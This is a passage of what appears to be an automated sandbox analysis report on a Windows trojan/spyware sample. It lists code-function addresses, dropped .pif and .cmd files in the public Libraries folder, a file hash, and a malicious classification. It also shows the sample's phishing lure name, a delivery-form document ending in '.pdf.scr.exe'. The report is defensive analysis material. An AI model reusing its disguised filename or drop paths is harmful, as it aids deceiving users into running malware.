                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A106BD73_2_2A106BD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0528403_2_2A052840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05A8403_2_2A05A840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0368B83_2_2A0368B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07E8F03_2_2A07E8F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0669623_2_2A066962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0529A03_2_2A0529A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11A9A63_2_2A11A9A6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10EE263_2_2A10EE26
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050E593_2_2A050E59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10CE933_2_2A10CE93
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A062E903_2_2A062E90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10EEDB3_2_2A10EEDB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A092F283_2_2A092F28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A070F303_2_2A070F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F2F303_2_2A0F2F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F403_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CEFA03_2_2A0CEFA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC83_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C003_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB53_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040CF23_2_2A040CF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD003_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0ECD1F3_2_2A0ECD1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068DBF3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE03_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F02743_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D02C03_2_2A0D02C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10A3523_2_2A10A352
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05E3F03_2_2A05E3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1103E63_2_2A1103E6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E20003_2_2A0E2000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0401003_2_2A040100
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EA1183_2_2A0EA118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D81583_2_2A0D8158
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1041A23_2_2A1041A2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1101AA3_2_2A1101AA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1081CC3_2_2A1081CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06C6E03_2_2A06C6E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0747503_2_2A074750
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0507703_2_2A050770
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04C7C03_2_2A04C7C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F44203_2_2A0F4420
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1024463_2_2A102446
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FE4F63_2_2A0FE4F6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0505353_2_2A050535
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1105913_2_2A110591
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A107A463_2_2A107A46
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FA493_2_2A10FA49
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C3A6C3_2_2A0C3A6C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0EDAAC3_2_2A0EDAAC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A095AA03_2_2A095AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F1AA33_2_2A0F1AA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FDAC63_2_2A0FDAC6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FB763_2_2A10FB76
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06FB803_2_2A06FB80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08DBF93_2_2A08DBF9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C5BF03_2_2A0C5BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BD8003_2_2A0BD800
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0538E03_2_2A0538E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E59103_2_2A0E5910
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0599503_2_2A059950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06B9503_2_2A06B950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A059EB03_2_2A059EB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FF093_2_2A10FF09
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A051F923_2_2A051F92
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FFB13_2_2A10FFB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A013FD23_2_2A013FD2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A013FD53_2_2A013FD5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C9C323_2_2A0C9C32
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10FCF23_2_2A10FCF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A053D403_2_2A053D40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A101D5A3_2_2A101D5A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A107D733_2_2A107D73
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06FDC03_2_2A06FDC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0552A03_2_2A0552A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06B2C03_2_2A06B2C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F12ED3_2_2A0F12ED
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06D2F03_2_2A06D2F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10132D3_2_2A10132D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03D34C3_2_2A03D34C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A09739A3_2_2A09739A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FF0CC3_2_2A0FF0CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0570C03_2_2A0570C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F0E03_2_2A10F0E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1070E93_2_2A1070E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A08516C3_2_2A08516C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03F1723_2_2A03F172
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11B16B3_2_2A11B16B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05B1B03_2_2A05B1B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0956303_2_2A095630
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1016CC3_2_2A1016CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F7B03_2_2A10F7B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A10F43F3_2_2A10F43F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0414603_2_2A041460
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1075713_2_2A107571
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0ED5B03_2_2A0ED5B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A1195C33_2_2A1195C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004015603_1_00401560
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004020583_1_00402058
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004010E03_1_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004032303_1_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004012C03_1_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004033503_1_00403350
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004015533_1_00401553
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004025B03_1_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_004028703_1_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_00401D693_1_00401D69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_1_00401D703_1_00401D70
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: 5_2_028720C45_2_028720C4
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDB1B08_2_31DDB1B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E9B16B8_2_31E9B16B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E0516C8_2_31E0516C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DBF1728_2_31DBF172
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E870E98_2_31E870E9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F0E08_2_31E8F0E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD70C08_2_31DD70C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7F0CC8_2_31E7F0CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E1739A8_2_31E1739A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DBD34C8_2_31DBD34C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8132D8_2_31E8132D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E712ED8_2_31E712ED
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEB2C08_2_31DEB2C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DED2F08_2_31DED2F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD52A08_2_31DD52A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E995C38_2_31E995C3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6D5B08_2_31E6D5B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E875718_2_31E87571
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC14608_2_31DC1460
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F43F8_2_31E8F43F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8F7B08_2_31E8F7B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E816CC8_2_31E816CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E156308_2_31E15630
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD99508_2_31DD9950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEB9508_2_31DEB950
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E659108_2_31E65910
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD38E08_2_31DD38E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E3D8008_2_31E3D800
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E45BF08_2_31E45BF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E0DBF98_2_31E0DBF9
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEFB808_2_31DEFB80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FB768_2_31E8FB76
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7DAC68_2_31E7DAC6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E15AA08_2_31E15AA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E71AA38_2_31E71AA3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6DAAC8_2_31E6DAAC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E43A6C8_2_31E43A6C
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FA498_2_31E8FA49
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E87A468_2_31E87A46
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEFDC08_2_31DEFDC0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E87D738_2_31E87D73
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD3D408_2_31DD3D40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E81D5A8_2_31E81D5A
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FCF28_2_31E8FCF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E49C328_2_31E49C32
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31D93FD28_2_31D93FD2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31D93FD58_2_31D93FD5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD1F928_2_31DD1F92
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FFB18_2_31E8FFB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8FF098_2_31E8FF09
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD9EB08_2_31DD9EB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E881CC8_2_31E881CC
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E901AA8_2_31E901AA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E841A28_2_31E841A2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E581588_2_31E58158
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC01008_2_31DC0100
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6A1188_2_31E6A118
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E620008_2_31E62000
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E903E68_2_31E903E6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDE3F08_2_31DDE3F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8A3528_2_31E8A352
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E502C08_2_31E502C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E702748_2_31E70274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E905918_2_31E90591
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD05358_2_31DD0535
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E7E4F68_2_31E7E4F6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E824468_2_31E82446
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E744208_2_31E74420
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCC7C08_2_31DCC7C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DF47508_2_31DF4750
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD07708_2_31DD0770
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DEC6E08_2_31DEC6E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E9A9A68_2_31E9A9A6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD29A08_2_31DD29A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE69628_2_31DE6962
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DFE8F08_2_31DFE8F0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DB68B88_2_31DB68B8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDA8408_2_31DDA840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD28408_2_31DD2840
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E86BD78_2_31E86BD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8AB408_2_31E8AB40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCEA808_2_31DCEA80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DCADE08_2_31DCADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE8DBF8_2_31DE8DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DDAD008_2_31DDAD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E6CD1F8_2_31E6CD1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC0CF28_2_31DC0CF2
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E70CB58_2_31E70CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD0C008_2_31DD0C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DC2FC88_2_31DC2FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E4EFA08_2_31E4EFA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E44F408_2_31E44F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E12F288_2_31E12F28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E72F308_2_31E72F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DF0F308_2_31DF0F30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8EEDB8_2_31E8EEDB
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DE2E908_2_31DE2E90
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8CE938_2_31E8CE93
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31DD0E598_2_31DD0E59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_2_31E8EE268_2_31E8EE26
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004015608_1_00401560
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004020588_1_00402058
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004025B08_1_004025B0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004028708_1_00402870
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004010E08_1_004010E0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004032308_1_00403230
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004012C08_1_004012C0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004033508_1_00403350
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_004015538_1_00401553
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_00401D698_1_00401D69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 8_1_00401D708_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\dxobknwL.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 029487A0 appears 54 times
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 02948824 appears 45 times
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 029344AC appears 73 times
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 0293480C appears 931 times
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 029344D0 appears 32 times
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: String function: 029346A4 appears 244 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 31E17E54 appears 107 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 31E4F290 appears 103 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 31DBB970 appears 262 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 2A097E54 appears 107 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 2A0CF290 appears 103 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 31E05130 appears 58 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 2A085130 appears 58 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 2A03B970 appears 262 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 31E3EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: String function: 2A0BEA12 appears 86 times
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: String function: 028887A0 appears 48 times
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: String function: 0287480C appears 619 times
                      Source: C:\Users\Public\Libraries\Lwnkboxd.PIFCode function: String function: 028746A4 appears 154 times
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767809521.000000007ECB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.0000000021696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818324740.00000000216CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.00000000024E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1794843629.000000000251E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1818534654.0000000021806000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000002.1820675852.000000007F1F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1768171604.00000000216C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, 00000000.00000003.1767660498.000000007ED13000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe
                      Source: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/8@3/3
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02937F5A GetDiskFreeSpaceA,0_2_02937F5A
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeCode function: 0_2_02946D50 CoCreateInstance,0_2_02946D50
                      Source: C:\Users\user\Desktop\Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exeFile created: C:\Users\Public\LwnkboxdF.cmdJump to behavior
